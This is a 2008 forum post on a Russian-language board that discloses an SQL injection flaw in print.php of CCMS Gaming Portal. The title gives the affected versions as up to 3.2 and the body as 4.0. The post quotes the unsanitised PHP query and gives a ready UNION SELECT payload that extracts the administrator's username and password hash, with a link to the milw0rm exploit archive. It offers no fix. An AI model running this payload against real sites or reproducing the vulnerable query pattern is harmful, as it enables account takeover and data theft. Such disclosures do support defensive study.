CCMS Gaming Portal <= 3.2 SQL Injection Vulnerability

Discussion in 'Веб-уязвимости' started by ~!DoK_tOR!~, 21 Aug 2008.

  1. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    CCMS Gaming Portal <= 4.0 SQL Injection Vulnerability

    Author: ~!Dok_tOR!~
    Date found: 21.08.08
    Product: CCMS Gaming Portal
    Version: 4.0
    The price: $55
    URL: customcms.net
    Vulnerability Class: SQL injection
    Condition: magic_quotes_gpc = Off

    print.php

    Vuln code:

    PHP:
      $q mysql_query("SELECT * from ccms_news_comments WHERE w_id='$id'"); 
    http://localhost/[installdir]/

    Exploit:

    Code:
    print.php?id='+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+ccms_user+where+userid=1/*
    http://milw0rm.com/exploits/6284
    (c) ~!Dok_tOR!~
     
    #1 ~!DoK_tOR!~, 21 Aug 2008
    Last edited: 26 Aug 2008
    1 person likes this.